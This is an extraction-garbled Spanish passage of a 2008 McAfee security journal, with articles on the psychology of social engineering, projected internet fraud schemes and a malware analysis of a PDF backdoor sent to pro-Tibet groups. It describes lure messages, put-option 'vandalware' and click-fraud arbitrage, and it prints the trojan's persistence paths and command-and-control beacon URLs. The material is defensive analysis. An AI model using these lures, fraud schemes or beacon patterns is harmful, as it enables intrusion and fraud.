Error fundamental de atribucin las personas asumimos que los comportamientos de los dems reflejan sus caractersticas internas estables19. ste es el error de las primeras impresiones equivocadas. Un ingeniero social se emplear con diligencia para crear una primera impresin favorable. Un agresor podra mostrarse amable a la hora de hacer una solicitud, o dominante a la hora de coaccionar a sus vctimas para que hagan algo. las vctimas pueden no percatarse de que sus interlocutores son actores y de que su comportamiento es circunstancial, un medio para lograr un fin. Efecto de saliencia Dado un grupo de personas, tendemos a creer que la persona con mayor o menor influencia es la que ms sobresale20. los ingenieros sociales son expertos en mezclarse y confundirse con su entorno, y tratan por todos

oToo 2008

11

conclusinnuestra susceptibilidad a la ingeniera social tiene su origen en la estructura del cerebro humano, en la compleja interaccin entre los centros de la emocin y la razn. la ingeniera social es la manipulacin del miedo, la curiosidad, la codicia o la compasin de la vctima. los sesgos y errores cognitivos en nuestros esquemas sociales permiten explicar el xito de la ingeniera social. entonces, por qu esta informacin es tan importante para nosotros? en la encuesta anual sobre seguridad y crimen informtico (computer crime and security survey) de 2007 realizada por el instituto para la seguridad informtica (csI), slo un 13% de los encuestados manifest haber comprobado cun eficaz era la formacin de sus empleados frente a los ataques de ingeniera social21. aunque un 13% es un cifra baja, la encuesta no inclua a los encuestados que no tenan un programa de formacin sobre ataques de ingeniera social. Un paso obvio es crear y mejorar las polticas de seguridad y los programas de formacin de los usuarios sobre ingeniera social. cualquier poltica en materia de ingeniera social resultar ms convincente si utiliza estudios cientficos que la avalen. asimismo, los materiales formativos de los usuarios tambin sern ms eficaces si incluyen los sesgos cognitivos que suelen aprovechar los ingenieros sociales, y los vdeos didcticos ms provechosos si reproducen ataques que aprovechan cada uno de nuestros sesgos cognitivos. no podemos cambiar la naturaleza humana. Hemos nacido con nuestras emociones y razn divididas, y somos propensos a cometer errores mentales. esto es normal, pero dicho comportamiento es peligroso bajo el dictado de los ingenieros sociales. si entendemos la psicologa de la ingeniera social y formamos a los usuarios para que conozcan sus efectos, podremos defendernos de estos ataques con mayor xito.

Karthik Raman, cIssP, es cientfico de investigacin en Mcafee avert labs. sus reas de investigacin incluyen el anlisis de vulnerabilidades y la seguridad de redes y software. adems de la seguridad, tambin est interesado en las ciencias cognitiva y social, y en la programacin de equipos. Para divertirse, raman juega al cricket, toca la guitarra y estudia idiomas. raman se licenci en Informtica y seguridad Informtica en la norwich University (Vermont) en 2006.

NOTAS1 Bank loses $1.1M to online fraud (Un banco sufre prdidas de 1,1 millones de dlares a causa de un fraude online), BBc (2007). http://news.bbc.co.uk/2/hi/business/6279561.stm 2 schneier, B., The Psychology of security (la psicologa de la seguridad), essays and op eds (2007). http://www.schneier.com/essay-155.html 3 Ibid. 4 asimov, I. el cerebro humano, Barcelona: ediciones Toray, 1967. 5 Johnson, s. la mente de par en par: nuestro cerebro y la neurociencia en la vida cotidiana, Madrid: ediciones Turner, 2006. 6 svoboda, e. cultivating curiosity; how to explore the world: Developing a sense of wonder can be its own reward (cultivar la curiosidad; cmo explorar el mundo: el desarrollo del sentido del asombro puede ser su propia recompensa), Psychology Today (2006). http://psychologytoday.com/articles/index.php?term=pto-4148.html 7 leyden, J. Hackers debut malware loaded UsB ruse (los piratas estrenan la estratagema de las unidades UsB infectadas con malware), The register (2007). http://www.theregister.co.uk/2007/04/25/usb_malware/ 8 Mcafee VIl: gPcoder.i, 9 de junio de 2008. http://vil.nai.com/vil/content/v_145334.htm 9 cialdini, r. Influence: The Psychology of Persuasion (Influencia: la psicologa de la persuasin), nueva york: Harpercollins, 1998. 10 Heuer, richard J., Jr. The Psychology of Intelligence analysis (la psicologa del anlisis de la inteligencia), Center for the Study of Intelligence, cIa (2002). http://www.au.af.mil/au/awc/awcgate/psych-intel/art12.html 11 Tversky, a. y Kahneman, D. Judgment under uncertainty: Heuristics and biases (Juicio ante la incertidumbre: heurstica y sesgos), science, 185, 1124-1130 (1974). http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf 12 Mather, M., shafir, e., y Johnson, M. K. Misrememberance of options past: source monitoring and choice (Distorsin de opciones pasadas: supervisin del origen y eleccin), Psychological Science, 11, 132-138 (2000). http://www.usc.edu/projects/matherlab/pdfs/Matheretal2000.pdf 13 nickerson, r. s. confirmation Bias: a Ubiquitous Phenomenon in Many guises (sesgo de confirmacin: un fenmeno ubicuo con muchas formas), Review of General Psychology, Vol. 2, no. 2, 175-220 (1998). http://psy.ucsd.edu/~mckenzie/nickersonconfirmationBias.pdf 14 Zajonc, r. B. attitudinal effects of Mere exposure (efectos actitudinales de la mera exposicin), Journal of Personality and Social Psychology, 9, 2, 1-27 (1968). 15 Kaplan, D. Virginia Tech massacre may spawn phishing scams (la masacre de Virginia Tech puede dar pie a fraudes de tipo phishing), SC Magazine (2007). http://www.scmagazineuk.com/Virginia-Tech-massacre-may-spawn-phishing-scams/ article/105989/ 16 Tversky, a. y Kahneman, D. Judgment under uncertainty: Heuristics and biases (Juicio ante la incertidumbre: heurstica y sesgos), Science, 185, 1124-1130 (1974). Disponible en http://psiexp.ss.uci.edu/research/teaching/ Tversky_Kahneman_1974.pdf. 17 Dhamija, r., ozment, a., schecter, s. The emperors new security Indicators: an evaluation of website authentication and the effect of role playing on usability studies (los nuevos indicadores de seguridad de emperor: una evaluacin de la autenticacin de sitios Web y el efecto de los juegos de rol en los estudios de la usabilidad), (2008). http://www.usablesecurity.org/emperor/ 18 Mitnick, Kevin D., simon, William l. el arte de la intrusin, Mxico: ra-Ma, 2007. 19 gilbert, D. T., y Malone, P. s. The correspondence bias (el sesgo de correspondencia), Psychological Bulletin, 117, 2138 (1995). http://www.wjh.harvard.edu/~dtg/gilbert%20&%20Malone%20 (corresPonDence%20BIas).pdf 20 Taylor, s.e. y Fiske, s.T. Point of view and perception so causality (Punto de vista y percepcin de la causalidad), Journal of Personality and Social Psychology,, 32, 439-445 (1975). 21 computer security Institute, csI computer crime and security survey (2007). http://www.gocsi.com/forms/csi_survey.jhtml (es necesario registrarse)

12

McaFee secUrITy JoUrnal

Ingeniera social 2.0: y ahora qu?Markus Jakobsson

aunque posiblemente la ingeniera social ha estado entre nosotros desde los orgenes de la civilizacin, son muchos los que muestran su preocupacin porque en la actualidad se est transformando y sembrando el caos en Internet. en este artculo, ofrecemos algunas previsiones sobre lo que cabe esperar en el futuro.Parece obvio que la ola de crimeware que vivimos est motivada por los incentivos econmicos. la situacin actual nada tiene que ver con la que observamos en el pasado. los primeros virus eran slo una expresin de curiosidad intelectual, competitividad y quizs algo de hasto. esto es especialmente patente en el caso de los fraudes de clic y el phishing. Qu otra motivacin se puede encontrar que no sea la de conseguir algo de dinero? (o a veces, incluso mucho dinero.) Igual ocurre con el spam en sus distintos formatos. si los remitentes de spam no ganaran dinero, no habra spam. Por lo tanto, si deseamos prever cules sern las tendencias en el futuro, tiene sentido plantearse cmo pueden obtener beneficios los delincuentes mediante el uso fraudulento de las funciones actuales de Internet.

los defensas configuran los ataquesDesde el punto de vista de los delincuentes, cometer fraudes a travs de Internet es una actividad relativamente cmoda y segura. aparte de ser el teletrabajo perfecto para un gamberro, ofrece escalabilidad, alta rentabilidad y le permite en gran medida ocultar su rastro, por lo que el riesgo es mnimo. as que, no es de extraar que el fraude a travs de Internet se haya disparado. Pero, para comprender los ataques, debemos comprender tambin las defensas. es evidente que en la actualidad la lucha contra los delitos se articula en tres planos diferentes: las herramientas tcnicas (como el software antivirus, los filtros para el correo spam y los complementos del navegador para impedir el phishing); las campaas educativas (como las organizadas por FTc, eBay, securitycartoon.com, bancos y el grupo carnegie Mellon University Usable Privacy and security laboratory [cUPs]) y, por ltimo, los medios legales. estos ltimos normalmente implican la localizacin del origen, la requisicin de la caja de caudales y, por ltimo, el procesamiento de los responsables. las iniciativas en el campo tcnico y educativo, si funcionaran, reduciran la rentabilidad para los delincuentes y, por otro lado, los esfuerzos legales aumentaran el riesgo de sus actividades. estos riesgos son importantes, especialmente si tenemos en cuenta lo fcilmente que escala el fraude a travs de Internet. Por lo tanto, no es descabellado pensar que la prxima frontera en la ciberdelincuencia incluir un componente que dificulte el seguimiento. Tomemos como vlido este supuesto e investiguemos qu podra significar en el futuro. Para ello, vamos a considerar dos tipos de ataques muy difciles de localizar. Hasta la fecha no se ha producido ninguno de ellos, pero ambos estn preparados. Pero, en primer lugar, para entender realmente la importancia del aspecto legal, nos saldremos por la tangente y analizaremos por qu el ransomware no se convirti nunca en el desastre que muchos vaticinaban.

Fraudes en Internet: un delito sociotcnicocada vez ms expertos reconocen que el fraude ya no es nicamente un problema de carcter tcnico, sino que existe un componente de ingeniera social que est cada da ms presente. el phishing es un buen ejemplo, pero no el nico. cada vez son ms habituales los ataques de crimeware que dependen de la ingeniera social para su instalacin. Un ejemplo reciente es el timo denominado "Better Business Bureau", que se ilustra en la Figura 1. en este ataque de phishing, la vctima potencial recibe un mensaje de correo electrnico que parece proceder de la empresa Better Business Bureau, en relacin con una reclamacin contra la empresa del destinatario. el adjunto, que supuestamente contiene los detalles de la queja, en realidad incluye un troyano de descarga. y lo que es peor, estos mensajes se suelen enviar a las personas con ms responsabilidad en la empresa, normalmente a los encargados de atender las quejas de los clientes a diario.

oToo 2008

13

el fracaso del ransomwarea finales de la dcada de los 90, algunos investigadores de la Universidad de columbia afirmaron que la siguiente ola de malware podra intentar secuestrar los archivos de los equipos de las vctimas codificndolos mediante una clave pblica incluida en el cuerpo del malware. a continuacin, los delincuentes pediran un rescate a cambio de la clave secreta que proporcionara acceso a los archivos cifrados. aos despus, el troyano archiveus realiz un ataque de estas caractersticas, aunque con una pequea diferencia: utiliz criptografa de clave simtrica, en lugar de una clave pblica. el ataque se frustr cuando, mediante un proceso de ingeniera inversa del troyano, se extrajo la clave de cifrado/descifrado y se distribuy a todas las personas que haban sido vctimas del ataque. sin embargo, es posible que el ataque de archiveus nunca hubiera prosperado aunque hubiese utilizado criptografa de clave pblica (que, por su naturaleza, habra impedido revertir la ingeniera de la clave de cifrado del cdigo, ya que, en primer lugar, nunca habra estado ah). el motivo por el que archiveus habra fracasado no es de carcter tcnico; sino que es ms bien de carcter financiero: los delincuentes no podran nunca haber recogido el rescate de forma segura sin dejar ningn rastro.

y qu ocurrira si alguien abriera o ejecutara el archivo adjunto? Pongamos por caso que el mensaje no terminara en la carpeta de spam y que el sistema antivirus no lo detectara, entonces, tendramos una infeccin en un equipo con acceso a informacin confidencial o al sitio Web de la empresa. y qu pasara si parte de esa informacin confidencial acabara en Internet, incluso en el sitio Web de la propia empresa? el revuelo sera inevitable y el precio de las acciones se vera afectado. entonces, el delincuente hara efectivas sus opciones de venta, aprovechndose de que conoca de antemano que el precio de las acciones de la empresa iba a descender. su comportamiento no parecera sospechoso, no sera posible localizarlo, ya que todos los inversores con opciones de venta estaran en la misma situacin. Quin sera el delincuente? nadie podra decirlo.

Falsificacin de clicsel fraude del clic es otro tipo de fraude habitual en Internet. aprovecha el hecho de que cuando un particular hace clic en un anuncio, el anunciante paga una comisin al sitio Web que contiene el anuncio y al portal que proporciona el anuncio al sitio Web. otros tipos de fraude relacionados aprovechan la publicidad en la que se transfiere dinero cuando el particular ve un anuncio de banner, con independencia de lo que haga, y otras modalidades en las que se genera una venta u otra accin cuando alguien ve un anuncio. el objetivo puede ser obtener beneficios econmicos de estas transferencias (los delincuentes obtienen ganancias cuando sus sitios Web muestran los anuncios) o agotar el presupuesto para publicidad de sus competidores (cuando stos son los anunciantes desde los que se transfiere el dinero). con frecuencia, los delincuentes generan trfico de forma automtica, de forma que parezca que personas reales han visto los anuncios. la automatizacin puede incluir distintas formas de malware, como las redes de bots. otro mtodo habitual entre los delincuentes es contratar a personas para que hagan clic en determinados anuncios; esto se denomina "click farm" (literalmente, "fbrica de clics").Reclamacin contra BBB

el azote del vandalwaresin perder de vista el ejemplo del ransomware, consideraremos un nuevo tipo de ataque, que podemos denominar "vandalware". no se trata de vandalismo por diversin o rebelda, sino ms bien como medio de conseguir dinero. el delincuente actuara de la siguiente forma: en primer lugar, seleccionara una empresa como objetivo y utilizara tcnicas de extraccin de datos para obtener el mximo de informacin sobre los empleados que son vulnerables. entendemos por empleado vulnerable aquel que tiene acceso a datos confidenciales o bien a las pginas de la fachada de la pgina Web de la empresa. a partir de ellos, uno de estos vndalos puede conseguir informacin de la estructura interna de la empresa, los nombres de los empleados clave y el formato utilizado para las direcciones de correo electrnico. en segundo lugar, el delincuente adquirira opciones de venta de la empresa. (Damos por supuesto que se trata de una empresa que cotiza en bolsa.) Una opcin de venta es un instrumento financiero que aumenta su valor si el precio de la accin correspondiente cae; los inversores y especuladores utilizan las opciones de venta para obtener ganancias cuando disponen de informacin de que una accin determinada va a perder valor. con toda probabilidad, otros inversores, no slo el delincuente, compraran tambin opciones de venta, especialmente si el volumen de negociacin de las acciones de la empresa es considerable. en tercer lugar, el delincuente desencadenara un ataque contra la empresa, quizs enviando a los empleados seleccionados mensajes falsos como si procedieran de otro empleado, como su jefe: Hola Juan. Mira las diapositivas de PowerPoint que adjunto y dime qu piensas. si es posible, envame una evaluacin rpida para maana por la maana. espero que puedas hacerlo. o, quizs, de un administrador del sistema: Hay un nuevo virus informtico y nuestros sistemas no disponen an de los parches necesarios para neutralizarlo. Instalar inmediatamente en vuestros equipos el programa que adjunto. es importante hacerlo cuanto antes.

BBB CASE #569822971Complaint filed by: Michael Taylor Complaint filed against: Complaint status: Category: Case opened date: Contract Issues Case closed date: 2/28/2008 *** Attached you will find a copy of the complaint. Please download and keep this copy so you can print it for your records.*** On February 26 2008, the consumer provided the following information: (The consumer indicated he/she DID NOT received any response from the business.) The form you used to register this complaint is designed to improve public access to the Better Business Bureau of Consumer Protection Consumer Response Center, and is voluntary. Through this form, consumers may electronically register a complaint with the BBB. Under the Paperwork Reduction Act, as amended, an agency may conduct or sponsor, and a person is not required to respond to, a collection of information unless it displays a currently valid OMB control number. That number is 502-793. 2008 BBB.org, All Rights Reserved. Business Name: Contact: BBB Member:

Figura 1: Timo del Better Business Bureau. El mensaje contiene un adjunto infectado que el agresor espera que abra el destinatario.

14

McaFee secUrITy JoUrnal

a continuacin, describiremos cmo se puede utilizar la ingeniera social en una nueva clase de fraude de clic. en primer lugar, empezaremos por explicar el caso ms habitual que no constituye un fraude de clic:

Caso 1 sitio Web estndar. Pensemos en un sitio Web legtimo que proporciona determinados servicios y que muestra anuncios relativos a dichos servicios. los portales de anuncios (por ejemplo, google y yahoo) normalmente determinan de forma automtica el contenido de los anuncios. Para ello, examinan el contenido del sitio Web y seleccionan anuncios sobre temas relacionados con dicho contenido. si, por ejemplo, el sitio Web se dedica a la cocina, los anuncios pueden referirse a bateras de cocina, sartenes o cafeteras. normalmente estos sitios colocan anuncios que atraen trfico. en este sitio cabe esperar ver anuncios que utilicen las palabras clave cuchillo, horno, tefln y otros similares. no hay nada inusual en este tipo de sitio. Caso 2 Uso de arbitraje. ahora, consideremos un segundo sitio Web que tiene contenido que selecciona anuncios correspondientes a las palabras clave buscar abogados (find a attorney). (exactamente buscar abogados y no buscar abogado. Pronto explicaremos por qu.) el sitio puede utilizar para esto mucho texto (visible o no) que repite esta frase. supongamos que, cuando se escribi este artculo, el coste de este tipo de estrategia era de 1,07 a 7,05 dlares por palabra clave (precio en estados Unidos para las palabras correspondientes en ingls). el precio exacto depende del lugar, la hora del da y, naturalmente, las dems ofertas que haya para las palabras clave en cuestin, ya que todos los precios de palabras clave se establecen en subastas. De este modo, si un usuario hace clic en un anuncio de este sitio, el propietario del anuncio tendra que pagar ese importe al portal, que a su vez transferira ese importe, descontando su comisin, al sitio Web que muestra el anuncio. ahora, imaginemos que el sitio en cuestin incluye un anuncio que utiliza la palabra clave buscar abogado. la nica diferencia es una s. el precio de esta palabra clave va de 0,87 a 3,82 dlares. supondremos que el sitio Web paga 2 dlares por cada visitante que consigue y recibe 4 por cada visitante que hace clic en un anuncio del sitio. siempre que el cincuenta por ciento de los visitantes que llegan a travs del anuncio de 2 dlares hagan clic en un anuncio de 4 dlares, el sitio Web consigue ganancias, sin proporcionar ningn servicio. esto se conoce como arbitraje de palabras clave. no es exactamente igual que el fraude de clic, pero, como podremos ver, se acerca.

ciento de los enfermos de asma tienen riesgo de contraer mesotelioma? aunque esta afirmacin no es cierta, habr muchas personas a las que les preocupa el asma y que no saben nada del mesotelioma. estas personas harn justo lo que pretende el delincuente: hacer clic. sern la mitad de los visitantes? si hay mil visitantes al da, esto significa que las ganancias diarias superarn los 30.000 dlares. e incluso si utilizara palabras clave menos llamativas, el delincuente conseguira unas ganancias nada desdeables. lo que distingue estos tres casos es la intencin y el uso que se hace de la ingeniera social. Desde la perspectiva de los proveedores de anuncios, estos tres casos son muy similares en cuanto a estructura. Un visitante entra, lee el contenido y hace clic en un anuncio. aunque es posible comparar las palabras clave que entran y las que salen para localizar anomalas, los delincuentes tambin pueden utilizar un proveedor de servicios para generar respectivamente el trfico entrante y el trfico saliente. esta estrategia dificulta la deteccin y la neutralizacin de estos tipos de ataques, especialmente si se llevan a cabo a pequea escala con un nmero reducido de sitios.

conclusinla ingeniera social ha llegado a Internet para quedarse. sus efectos ya son patentes a travs de timos de phishing y ahora empezamos a observar cmo los delincuentes utilizan la ingeniera social para mejorar la eficacia del spam y el crimeware. adems, mucho nos tememos que nos aguardan aplicaciones an ms sofisticadas a la vuelta de la esquina, resultado de la cada vez mayor complejidad del uso de la ingeniera social en otros tipos de fraude, como el fraude de clic. conscientes de esto, podemos disear medidas tcnicas y gracias al conocimiento de los posibles modos de ataque en el futuro, podremos mejorar las defensas. Pero debemos entender tambin que nuestra estrategia requiere mejores interfaces de usuario, mejores procedimientos, una legislacin ms restrictiva y mejores campaas educativas. Todava queda mucho por hacer.

Caso 3 Un ataque utilizando ingeniera social. ahora veremos cmo podra utilizar un delincuente la ingeniera social y explotar la tcnica del arbitraje con el fin de conseguir ganancias espectaculares. supongamos que el delincuente crea un sitio Web que genera la palabra clave mesotelioma (un tipo de cncer poco frecuente provocado por la exposicin al amianto). en el momento de redaccin de este documento, esta palabra clave de google cuesta 63,42 dlares (precio en estados Unidos de la palabra en ingls). el delincuente compra trfico para la palabra clave asma (0,10 dlares) para atraer visitantes al sitio. si de 634 personas que entren al sitio una hace clic en el anuncio del mesotelioma, el delincuente gana dinero. Pero, por qu hara alguien algo as? supongamos que el contenido del sitio Web es un artculo, supuestamente escrito por un mdico, que pregunta: saba que el diez por

Dr. Markus Jakobsson es cientfico jefe en el centro de investigacin Palo alto research center. se encarga de la investigacin del phishing y de las medidas para combatirlo, los fraudes de clic, el factor humano en la seguridad, la criptografa, la proteccin de las redes y el diseo de protocolos. es editor de Phishing and Countermeasures (el phishing y las medidas para combatirlo; Wiley, 2006) y coautor de Crimeware: Understanding New Attacks and Defenses (crimeware: los nuevos ataques y las defensas; symantec Press, 2008).Imagen cortesa de Parc, fotgrafo: Brian Tramontana.

oToo 2008

15

Un objetivo perfecto para el malware de ingeniera socialElodie Grandjean

los creadores de malware suelen emplear mtodos de ingeniera social para infectar directamente un sistema o un host o para iniciar una cascada de descargas y ejecutar malware.la mayora de nosotros hemos recibido algn mensaje de correo electrnico que contena adjuntos o Url maliciosos con informacin sobre una importante actualizacin de seguridad o sobre un viejo amigo deseoso de restablecer el contacto perdido. Pero no vaya a creerse que el correo electrnico es el nico vector de ataque utilizado para propagar malware con trucos de ingeniera social. Hay muchas otras trampas, incluido el uso de conocidos servicios de mensajera instantnea. el sistema infectado de un amigo puede enviarle un mensaje solicitndole que vea unas imgenes con una Url que seala a un archivo. el problema est en que confa en el contacto y no sabe que el otro sistema est afectado. en muchos casos, la Url le lleva al malware. otras aplicaciones de malware recurren a la ingeniera social para robar informacin confidencial, como credenciales de inicio de sesin, nmeros de tarjetas de crdito, etc. estas tcnicas suelen utilizarse en ataques de phishing o intrusiones en servidores. los trucos ms frecuentes de ingeniera social que emplean los creadores de malware son los de servicios para adultos, pero hay otros. He aqu una lista, aunque es claramente incompleta:

Mensajes de correo electrnico amenazadores sobre penas de crcel o procedimientos de actuacin como miembro de un jurado salvapantallas y juegos gratuitos que contienen un troyano, o herramientas antispyware gratuitas que con frecuencia son programas no autorizados grandes acontecimientos, como encuentros deportivos, desastres climticos o noticias urgentes nombres de famosos y noticias sobre sus aventuras y escndalos relaciones que pueden ser de confianza o secretas, como afiliaciones a sitios Web de redes sociales, listas de amigos, compaeros de clase, familiares y amantes secretos

Vnculos e imgenes pornogrficos Uso de nombres de mujer en el campo del remitente Programas polticos que solicitan contribuciones en nombre de un candidato clebre Mensajes falsos de correo electrnico procedentes de bancos, servicios de pago electrnico y otros servicios financieros que solicitan la confirmacin o actualizacin de las credenciales de inicio de sesin o informacin sobre la tarjeta de crdito

el catlogo de temas es prcticamente ilimitado, lo que significa que es posible acercarse a grandes grupos de usuarios de todo el mundo y que la ingeniera social puede dirigirse con frecuencia a grupos de usuarios nacionales e incluso locales. Por ejemplo, con un ataque global que tenga como marco un sitio Web de red social muy visitado, el creador de malware puede obtener respuestas de todo el mundo; por su parte, es probable que un ataque similar en las elecciones presidenciales estadounidenses slo capte vctimas norteamericanas.

16

McaFee secUrITy JoUrnal

Por qu las olimpiadas?Durante meses, china ha estado en el punto de mira a causa de los Juegos olmpicos de Pekn 2008. el inters de los medios de comunicacin ha sido enorme y ha abarcado a atletas, aficionados, infraestructura, medio ambiente y poltica, entre otros. en el terreno poltico, las protestas por la situacin del Tbet han sido un tema muy delicado; muchas organizaciones de todo el mundo a favor del Tbet libre se han beneficiado del protagonismo de las olimpiadas. Tambin otros asuntos, como la esclavitud laboral y los derechos humanos, han cobrado ms relieve. y numerosos usuarios de Internet estn lo suficientemente interesados como para leer noticias y otros artculos online. la antorcha olmpica se convirti en un smbolo candente de los manifestantes en los meses anteriores a los Juegos. el viaje de la antorcha por todo el mundo tuvo una tremenda difusin en los medios de comunicacin y acrecent si cabe el inters y la participacin de seguidores y oponentes. este inters creciente tambin ampli el rea de ataque potencial que podan explotar los creadores de malware.

El uso de los Juegos Olmpicos como eje de ingeniera social permiti a los creadores de malware dirigirse a muchos entusiastas del deporte, adems de a todas las personas previamente identificadas por su inters en el conflicto entre el Tbet y China.

llegado este punto, la base de vctimas, que hasta entonces inclua a las organizaciones elegidas al principio y a sus simpatizantes, pas a englobar a cualquiera que sintiera curiosidad sobre la situacin en el Tbet. Una vez ms, la atencin de los medios favoreci este incremento entre la poblacin vulnerable. a continuacin, los creadores de malware se aprovecharon de los propios Juegos olmpicos para propagar ataques de ingeniera social con la aparicin del rootkit pro-Tbet2. este conjunto de archivos malintencionados funcionaba oculto bajo un archivo de pelcula de animacin que ridiculizaba el esfuerzo de un gimnasta chino; durante su reproduccin, varios archivos maliciosos se introducan inadvertidamente en el sistema de la vctima e instalaban un rootkit para esconderse. el uso de los Juegos olmpicos como eje de ingeniera social permiti a los creadores de malware dirigirse a muchos entusiastas del deporte, adems de a todas las personas previamente identificadas por su inters en el conflicto entre el Tbet y china.

Muestreo de vctimasnormalmente, los ataques de ingeniera social necesitan muestrear antes a sus vctimas para tener xito. Veamos quines podan ser las vctimas potenciales de un ataque que tuviera como cebo el conflicto china-Tbet o los Juegos olmpicos. ya hemos visto que, en los grupos a favor del Tbet, algunas personas reciban mensajes de correo electrnico sobre la situacin tibetana, china en general o las olimpiadas, con datos adjuntos cHM (archivos de ayuda compilados), PDF, PPT, Xls o Doc. Todos estos mensajes parecan proceder de una organizacin o persona de confianza. Probablemente estos usuarios estaban acostumbrados a recibir este tipo de documentos de sus simpatizantes y haban bajado la guardia. estos datos adjuntos en concreto eran malintencionados: utilizaban varias vulnerabilidades de la ayuda de HTMl compilado de Microsoft, adobe acrobat, Microsoft excel, Microsoft PowerPoint o Microsoft Word para introducir y ejecutar sigilosamente archivos ejecutables incrustados. en ese momento el rea de ataque elegida era relativamente pequea, pero la difusin meditica de las protestas en el Tbet contribuy a avivar la llama. Ms adelante se piratearon algunos sitios Web legtimos dedicados a apoyar al Tbet para incrustar el troyano Fribet1, que se descarga por s solo en los equipos de los visitantes aprovechando vulnerabilidades de los navegadores Web.

oToo 2008

17

caso real: ataque de malware en torno a los Juegos olmpicosHace poco recibimos el archivo PDF declaration_olympic_games_ eng.pdf, enviado inicialmente a un grupo pro Tbet (Vase la Figura 1). este documento pareca inofensivo porque al abrir la aplicacin apareca el texto y no haba daos ni problemas inmediatos. Por lo tanto, en general nadie sospechaba de actividades malintencionadas. sin embargo, en segundo plano se creaban subrepticiamente archivos maliciosos en el equipo de la vctima. Veamos exactamente cmo funcionaba el ataque. en realidad, declaration_olympic_games_eng.pdf es un archivo PDF vaco que aprovecha una vulnerabilidad de acrobat para introducir y ejecutar la primera parte del paquete malicioso. este archivo ejecutable malintencionado (detectado como BackDoorDoW3) se incrusta en formato cifrado en la ubicacin que muestra el editor hexadecimal de la Figura 2 (pgina siguiente). la Figura 3 (pgina siguiente) muestra los primeros bytes del archivo incrustado una vez descifrado.

este ejecutable introduce el archivo PDF legtimo, book.pdf, que se muestra al ejecutar el primer archivo. el archivo dropper busca el proceso AcroRd32.exe en la lista de procesos activos, encuentra el directorio donde est instalado acrobat y abre book.pdf. la Figura 4 muestra en la pgina siguiente el cdigo del archivo responsable de esta accin. el malware tambin introduce otro archivo ejecutable, book.exe, que se copia en %PERFILTODOSUSUARIOS%\Application Data\ msmsgs.exe y crea un nuevo servicio de Windows4. este nuevo servicio se muestra con el nombre servicio administrador de discos lgicos y se encarga de que, al iniciarse, Windows ejecute el troyano automticamente. el malware tiene incluso un plan B para interceptar el proceso de inicio: si no consigue crear el servicio, aade una nueva entrada de registro, Windows Media Player, que seala a msmsgs.exe. Windows Media Player se aade a la siguiente clave de inicio del registro de Windows5: HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run. el troyano tambin crea dos archivos que contienen datos cifrados:

C:\WINDOWS\jwiev.log.bak C:\WINDOWS\clocks.avi.bak

Sponsors declaration of responsibility at the 2008 Beijing Olympic GamesWITH REFERENCE TO, and consistent with, our obligations under the Olympic Charter, the undersigned sponsor of the 2008 Beijing Olympic Games hereby declares: We reaffirm our commitment to the harmonious development of man, with a view to promoting a peaceful society concerned with the preservation of human dignity, as set forth in the Olympic Charter, and We acknowledge that sponsorship of the Olympic Games carries certain responsibilities, including the responsibility of implementing our sponsorship and communications programs in a manner that promotes awareness of basic human rights such as the right to free speech, and We are fully aware of the assurance made by the government of the Peoples Republic of China to the Olympic Committee to improve its human rights record as a condition for hosting the Olympic Games and recognize the worldwid concerns expressed about Chinas human rights record. IN FURTHERANCE TO THE ABOVE, we agree to demonstrate our commitment to human rights at the 2008 Beijing Olympics by: FIRST, making bona fide good faith efforts to raise the issue of human rights with our Chinese contacts and to publicly report on our efforts to do so, and SECOND, designating a high-level executive within our organization to monitor every aspect of our activities associated with the Olympics and to assure that our actions properly reflect our commitment to human dignity and human rights, and THIRD, establishing a fund through which contributions can be made to prisoners of conscience in China, and their families, as well as to those persecuted in connection with the 2008 Olympic Games, and FOURTH, presenting a corporate resolution to our Board of Directors resolving to adopt this Declaration, and the principles of human rights and human dignity upon which it is based, prior to the commencemento of the 2008 Olympic Games in Beijing, and FIFTH, incorporating this Declaration of Responsibility into our commercial messages. DECLARED BY

Figura 1: Hace poco los partidarios del Tbet recibieron este archivo aparentemente legtimo adjunto a un mensaje de correo electrnico.

Name/Title Date

18

McaFee secUrITy JoUrnal

Finalmente, book.exe desaparece creando un archivo por lotes que se autoelimina y autofinaliza. a partir de ese momento, msmsgs.exe toma el relevo. Msmsgs.exe introduce temporalmente otro archivo en la siguiente ubicacin: C:\Archivos de programa\WindowsUpdate\ Windows Installer.exe. Justo antes de borrarse, Windows Installer.exe introduce dos copias de un archivo Dll en:

el cdigo malicioso inyectado en svchost.exe llama a la funcin workFunc() de avp01.lic, que se conecta a un servidor remoto y enva tres solicitudes:

http://www1.palms[eliminado]/ld/v2/loginv2.asp?hi=2wsdf351&x =0720080510150323662070000000&y=192.168.1.122&t1=ne http://www1.palms[eliminado]/ld/v2/votev2.asp?a=7351ws2&s =0720080510150323662070000000&t1=ne http://www1.palms[eliminado]/ld/v2/logoutv2.asp?p=s9wlf1&s =0720080510150323662070000000&t1=ne

C:\Documents and Settings\All Users\DRM\drmv021.lic C:\Documents and Settings\All Users\DRM\avp01.lic

el malware se inyecta en svchost.exe para ocultar su actividad. lanza una nueva instancia de svchost.exe (proceso legtimo del sistema6), asigna un bloque de memoria en el espacio de direcciones de este nuevo proceso, guarda una copia de s mismo en el espacio de direcciones virtual de svchost.exe (en la direccin 0x400000) y ejecuta el cdigo malicioso creando un subproceso remoto.

los parmetros x e y pueden diferir. el valor de x se forma al concatenar 07 con la fecha (10/05/2008) y la hora (15:03:23) exactas en que se cre el archivo clocks.avi.bak y, para finalizar, con el cdigo no modificable 662070000000. el valor de y es la direccin IP del equipo de la vctima.

Figura 2: Este PDF malicioso transportaba una copia cifrada del malware BackDoor-DOW. Figura 4: El malware busca Acrobat Reader (AcroRd32.exe) y abre el archivo inocente book.pdf..

Figura 3: Versin descifrada de BackDoor-DOW.

oToo 2008

19

las tres secuencias de comandos del lado servidor, loginv2.asp, votev2.asp, y logoutv2.asp, informan al agresor de que dispone de una nueva mquina infectada, comprueban si el agresor ha enviado un comando y cierran la puerta trasera, respectivamente. Para leer la respuesta enviada tras conectarse a una de las secuencias de comandos del lado servidor, el troyano crea una copia de la pgina Web devuelta en la siguiente carpeta: C:\Archivos de programa\InstallShield Installation Information\ el nombre de archivo consta de un valor aleatorio de seis dgitos; una vez ledo, el archivo se borra. loginv2.asp y logoutv2.asp slo devuelven pginas Web vacas (con etiquetas ), pero votev2.asp devuelve cdigo que ms o menos significa la puerta trasera est lista pero de momento no hace falta ninguna accin (@n4@300@) o un comando como el siguiente:

